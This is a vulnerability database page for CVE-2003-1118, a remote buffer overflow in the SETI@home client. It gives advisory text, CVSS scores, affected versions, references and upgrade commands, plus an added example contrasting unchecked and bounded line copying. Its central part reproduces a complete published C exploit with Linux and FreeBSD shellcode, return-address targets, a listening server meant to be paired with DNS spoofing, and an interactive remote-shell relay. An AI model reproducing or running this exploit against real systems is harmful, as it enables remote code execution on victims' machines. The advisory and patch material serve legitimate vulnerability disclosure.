CVE-2003-1118
CVSS 7.5
Published: 2003-12-31 00:00:00
Revised: 2008-09-05 16:36:05

[Original] Buffer overflow in the SETI@home client 3.03 and other versions allows remote attackers to cause a denial of service (client crash) and execute arbitrary code via a spoofed server response containing a long string followed by a \n (newline) character.


[CNNVD] SETI@home Client Program Remote Buffer Overflow Vulnerability (CNNVD-200312-067)

SETI@home client 3.03 and other versions contain a buffer overflow vulnerability. A remote attacker can cause a denial of service (client crash) and execute arbitrary code via a spoofed server response containing an overlong string terminated by a \n (newline) character.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [performance may degrade or resource access may be interrupted]
Access complexity: LOW [exploitation has no access restrictions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/a:university_of_california:seti_at_home:3.4
cpe:/a:university_of_california:seti_at_home:3.7
cpe:/a:university_of_california:seti_at_home:3.3
cpe:/a:university_of_california:seti_at_home:3.5
cpe:/a:university_of_california:seti_at_home:3.6

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1118
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1118
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-067
(official data source) CNNVD

- Other links and resources

http://www.kb.cert.org/vuls/id/146785
(VENDOR_ADVISORY)  CERT-VN  VU#146785
http://www.securityfocus.com/bid/7292
(PATCH)  BID  7292
http://xforce.iss.net/xforce/xfdb/11731
(UNKNOWN)  XF  seti@home-newline-bo(11731)
http://lists.grok.org.uk/pipermail/full-disclosure/2003-April/004383.html
(UNKNOWN)  FULLDISC  20030406 Seti@home information leakage and remote compromise

- Vulnerability information

SETI@home Client Program Remote Buffer Overflow Vulnerability
High risk  Buffer overflow
2003-12-31 00:00:00 2006-08-24 00:00:00
Remote
SETI@home client 3.03 and other versions contain a buffer overflow vulnerability. A remote attacker can cause a denial of service (client crash) and execute arbitrary code via a spoofed server response containing an overlong string terminated by a \n (newline) character.

- Advisories and patches

FreeBSD has released an advisory (FreeBSD-SN-03:02) to address this issue.
The vendor has addressed this issue in version 3.08. Users are advised to upgrade their clients as soon as possible.
Gentoo Linux has released an advisory. Users who have installed app-sci/setiathome are advised to upgrade to setiathome-3.08 by issuing the following commands:
emerge sync
emerge setiathome
emerge clean
Fix:
SETI SETI@home 3.3
SETI SETI@home 3.4
SETI SETI@home 3.5
SETI SETI@home 3.6
SETI SETI@home 3.7

- Vulnerability information (8)

SETI@home Clients Buffer Overflow Exploit (EDBID:8)
linux remote
2003-04-08 Verified
0 zillion
N/A
/*
   Seti@Home exploit by zillion[at]safemode.org (2003/01/07)

   Credits for the vulnerability go to: SkyLined <SkyLined@edup.tudelft.nl>
   http://spoor12.edup.tudelft.nl/SkyLined%20v4.2/?Advisories/Seti@home

   Use this exploit in combination with a DNS spoofing utility such as the one
   provided in the Dsniff package. http://naughty.monkey.org/~dugsong/dsniff/

*/

#include <unistd.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <string.h>
#include <strings.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <errno.h>
#include <stdio.h>

#define NOP 0x41
#define EXEC "TERM=xterm; export TERM=xterm;exec /bin/sh -i"
#define EXEC2 "id;uname -a;"

char linux_shellcode[] =

   /* dup */
   "\x31\xc9\x31\xc0\x31\xdb\xb3\x04\xb0\x3f\xcd\x80\xfe\xc1\xb0"
   "\x3f\xcd\x80\xfe\xc1\xb0\x3f\xcd\x80"


   /* execve /bin/sh */
   "\x31\xdb\x31\xc9\xf7\xe3\x53\x68\x6e\x2f\x73\x68\x68\x2f\x2f"
   "\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";


char freebsd_shellcode[] =

  "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb1\x03\xbb\xff\xff\xff\xff"
  "\xb2\x04\x43\x53\x52\xb0\x5a\x50\xcd\x80\x80\xe9\x01\x75\xf3"

  "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
  "\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53"
  "\xb0\x3b\x50\xcd\x80";

char static_crap[] =

   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";

struct target
{
  int   num;
  char *description;
  char *versions;
  char *type;
  char *shellcode;
  long  retaddress;
  int   bufsize;
  int   offset;
  int   junk;
};

struct target targets[] =
{
  {0,  "Linux  2.2.* ", "3.03.i386      linux-gnu-gnulibc2.1 ", "Packet retr mode", linux_shellcode,
   0xbffff420, 520, 500, 0},
  {1,  "Linux  2.4.* ", "3.03 i386/i686 linux-gnu-gnulibc2.1 ", "Packet retr mode", linux_shellcode,
   0xbffff390, 520, 500, 1},
  {2,  "Linux  2.*   ", "3.03.i386/i686 linux-gnulibc1-static", "Packet retr mode", linux_shellcode,
   0xbffff448, 520, 500, 1},
  {3,  "All above    ", "3.03.i386      linux*               ", "Packet retr mode", linux_shellcode,
   0xbffff448, 520, 300, 1},
  {4,  "FreeBSD      ", "3.03.i386      FreeBSD-2.2.8        ", "Packet retr mode", freebsd_shellcode,
   0x0004956c, 520, 1, 2},
  {5, NULL, NULL, NULL, NULL, 0, 0, 0, 0}
};

/* Listen on the given port (the client is redirected here by DNS spoofing)
   and return the file descriptor of the first accepted connection. */
int open_socket(int port)
{

  int sock,fd;
  struct sockaddr_in servAddr;

  sock = socket(AF_INET, SOCK_STREAM, 0);
   if(sock<0) {
    printf("Error: Cannot open socket \n");
    exit(1);
  }

  /* bind server port */
  memset(&servAddr, 0, sizeof(servAddr));
  servAddr.sin_family = AF_INET;
  servAddr.sin_addr.s_addr = htonl(INADDR_ANY);
  servAddr.sin_port = htons(port);

  if(bind(sock, (struct sockaddr *) &servAddr, sizeof(servAddr))<0) {
    printf("Error: Cannot bind to port %d \n",port);
    exit(1);
  }

  listen(sock,5);
  fd=accept(sock,0,0);

  return fd;
}

void usage(char *progname) {

  int i;

  printf("\n---------------------------------------------------");
  printf("\n  *- Seti@Home remote exploit by zillion (s-m0de) -*");
  printf("\n---------------------------------------------------");
  printf("\n\nDefault      : %s  -h <target host>",progname);
  printf("\nTarget       : %s  -t <number>",progname);
  printf("\nOffset       : %s  -o <offset>",progname);
  printf("\nPort         : %s  -p <port>\n",progname);
  printf("\nDebug        : %s  -d \n",progname);

  printf("\nAvailable types:\n");
  printf("---------------------------------------------------\n");
  for(i = 0; targets[i].description; i++) {
    fprintf(stdout, "%d\t%s\t%s\t%s\n", targets[i].num, targets[i].description,
            targets[i].versions, targets[i].type);
  }
  printf("\n\n");
  exit(0);
}

/* Relay stdin/stdout to the connected socket. */
int sh(int sockfd) {
  char snd[1024], rcv[1024];
  fd_set rset;
  int maxfd, n;

  strcpy(snd, EXEC "\n");
  write(sockfd, snd, strlen(snd));

  read(sockfd,rcv,7);
  fflush(stdout);

  strcpy(snd, EXEC2 "\n");
  write(sockfd, snd, strlen(snd));

  /* Main command loop */
  for (;;) {
    /* the set must be cleared before every select() call */
    FD_ZERO(&rset);
    FD_SET(fileno(stdin), &rset);
    FD_SET(sockfd, &rset);

    maxfd = ( ( fileno(stdin) > sockfd )?fileno(stdin):sockfd ) + 1;
    select(maxfd, &rset, NULL, NULL, NULL);

    if (FD_ISSET(fileno(stdin), &rset)) {
      bzero(snd, sizeof(snd));
      fgets(snd, sizeof(snd)-2, stdin);
      write(sockfd, snd, strlen(snd));
    }

    if (FD_ISSET(sockfd, &rset)) {
      bzero(rcv, sizeof(rcv));

      /* leave one byte so rcv stays NUL-terminated for fputs() */
      if ((n = read(sockfd, rcv, sizeof(rcv)-1)) == 0) {
        /* exit */
        return 0;
      }

      if (n < 0) {
        perror("read");
        return 1;
      }

      fputs(rcv, stdout);
      fflush(stdout);
    }
  } /* for(;;) */
}


int main(int argc, char **argv){

  char *buffer=NULL,*tmp;
  int fd,arg,debug=0,type=0,port=80,offset=250;
  int ntargets = (int)(sizeof(targets)/sizeof(targets[0]));

  if(argc < 2) { usage(argv[0]); }

  while ((arg = getopt (argc, argv, "dh:o:l:p:t:")) != -1){
    switch (arg){
    case 'd':
      debug = 1;
      break;
    case 'o':
      offset = atoi(optarg);
      break;
    case 'p':
      port = atoi(optarg);
      break;
    case 't':
      type = atoi(optarg);
      break;
    default :
      usage(argv[0]);
    }
  }

  /* a valid target entry is required before the buffer can be built */
  if(type < 0 || type >= ntargets || targets[type].retaddress == 0) {
    usage(argv[0]);
  }

  if((targets[type].retaddress) != 0) {
    buffer = (char *)malloc((targets[type].bufsize));

    /* some junk may be required to counter buffer manipulation */

    if(targets[type].junk == 1) {

    tmp = (char *)malloc(strlen(static_crap) + strlen(targets[type].shellcode) + 1);

    strcpy(tmp,targets[type].shellcode);
    strcat(tmp,static_crap);

    targets[type].shellcode = tmp;

    }

    memset(buffer,NOP,targets[type].bufsize);
    memcpy(buffer + (targets[type].bufsize) - (strlen(targets[type].shellcode) + 8),
           targets[type].shellcode, strlen(targets[type].shellcode));

    /* Overwrite EBP and EIP */
    *(long *)&buffer[(targets[type].bufsize) - 8]  = (targets[type].retaddress - targets[type].offset);


    // If freebsd we need to place a value without 00 in ebp

    if(type == 4) {
       *(long *)&buffer[(targets[type].bufsize) - 8]  = 0xbfbff654;
    }

    *(long *)&buffer[(targets[type].bufsize) - 4]  = (targets[type].retaddress - targets[type].offset);

    /* Uncomment to overwrite eip and ebp with 41414141 */
    if(debug == 1) {
    *(long *)&buffer[(targets[type].bufsize) - 8]  = 0x41414141;
    *(long *)&buffer[(targets[type].bufsize) - 4]  = 0x41414141;
    }
  }

  fd = open_socket(port);

  /* the buffer is not NUL-terminated, so send exactly bufsize bytes
     followed by the newline the client's line handling expects */
  write(fd,buffer,targets[type].bufsize);
  write(fd,"\n",1);
  write(fd,"\n",1);

  sleep(1);
  sh(fd);

  close(fd);
  return 0;

}


// milw0rm.com [2003-04-08]

- Vulnerability information

16017
SETI@home Client Server Response String Overflow
Input Manipulation
Loss of Integrity

- Vulnerability description

Unknown or Incomplete

- Timeline

2003-04-06 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

SETI@home Client Program Remote Buffer Overflow Vulnerability
Class: Boundary Condition Error  Bugtraq ID: 7292
Remote: Yes  Local: No
Published: 2003-04-06 12:00:00  Updated: 2009-07-11 09:06:00
The discovery of this vulnerability has been credited to "Berend-Jan Wever" <SkyLined@edup.tudelft.nl>.

- Affected program versions

SETI SETI@home 3.7
SETI SETI@home 3.6
SETI SETI@home 3.5
SETI SETI@home 3.4
SETI SETI@home 3.3
SETI SETI@home 3.8

- Unaffected program versions

SETI SETI@home 3.8

- Vulnerability discussion

A vulnerability has been discovered in the SETI@home client program. Due to insufficient bounds checking when processing server data, it may be possible for a remote attacker to trigger a buffer overflow.

Successful exploitation of this issue may allow an attacker to execute arbitrary commands on a target system, with the privileges of the user invoking the application.

This vulnerability affects SETI@home releases prior to 3.08.
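The fault described above is a line copy with no check against the destination size. As an added illustration (this is not the SETI@home source, which is not on this page), the snippet below places that unchecked shape next to a bounded version that refuses a line longer than its buffer and a line with no terminating newline within the bytes actually received. FIELD_CAP and the two response lines are constructed for the example.

```c
#include <stddef.h>
#include <string.h>

/* Constructed field size for this example; the real client's buffer
   size is not stated on this page. */
#define FIELD_CAP 32

/* Vulnerable shape (illustrative): copy bytes until '\n' with no check
   against the destination size. A response whose first line is longer
   than dst overruns it, which is the "long string followed by \n"
   pattern the advisory describes. Not called by the demo below. */
void copy_line_unchecked(const char *resp, char *dst)
{
    while (*resp != '\n')
        *dst++ = *resp++;
    *dst = '\0';
}

/* Hardened form: the line is copied only if it is terminated by '\n'
   within resp_len bytes and fits in dst (cap - 1 bytes plus NUL).
   Returns the line length on success, -1 if no newline was received,
   -2 if the line would not fit. dst is untouched on failure. */
int copy_line_bounded(const char *resp, size_t resp_len,
                      char *dst, size_t cap)
{
    const char *nl = memchr(resp, '\n', resp_len);
    size_t len;

    if (nl == NULL)
        return -1;              /* incomplete line: do not trust it */
    len = (size_t)(nl - resp);
    if (cap == 0 || len > cap - 1)
        return -2;              /* overlong line: reject the response */
    memcpy(dst, resp, len);
    dst[len] = '\0';
    return (int)len;
}

/* Runs the bounded copy against constructed responses. Returns 1 when
   the well-formed line is accepted, the overlong line is rejected, the
   destination is left intact by the rejection, and an unterminated
   fragment is refused; 0 otherwise. */
int demo_bounded_parser(void)
{
    char field[FIELD_CAP];
    const char good[] = "result=ok\nnext-line";   /* constructed */
    char bad[202];                                /* constructed */

    if (copy_line_bounded(good, sizeof good - 1, field, sizeof field) != 9)
        return 0;
    if (strcmp(field, "result=ok") != 0)
        return 0;

    /* 200 'A' bytes followed by '\n': longer than FIELD_CAP - 1 */
    memset(bad, 'A', 200);
    bad[200] = '\n';
    bad[201] = '\0';
    if (copy_line_bounded(bad, 201, field, sizeof field) != -2)
        return 0;
    if (strcmp(field, "result=ok") != 0)   /* rejection wrote nothing */
        return 0;

    /* no newline within the received bytes */
    if (copy_line_bounded("partial", 7, field, sizeof field) != -1)
        return 0;
    return 1;
}
```

The bounded version keys its length check on the bytes actually received rather than on a terminator, so a spoofed server cannot push the copy past the buffer by withholding or delaying the newline either.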

- Exploit

It has been reported that an exploit is publicly available.

- Solution

FreeBSD has released an advisory (FreeBSD-SN-03:02) to address this issue.

The vendor has addressed this issue in version 3.08. Users are advised to upgrade their clients as soon as possible.

Gentoo Linux has released an advisory. Users who have installed app-sci/setiathome are advised to upgrade to setiathome-3.08 by issuing the following commands:

emerge sync
emerge setiathome
emerge clean

Fix:
SETI SETI@home 3.3
SETI SETI@home 3.4
SETI SETI@home 3.5
SETI SETI@home 3.6
SETI SETI@home 3.7

- References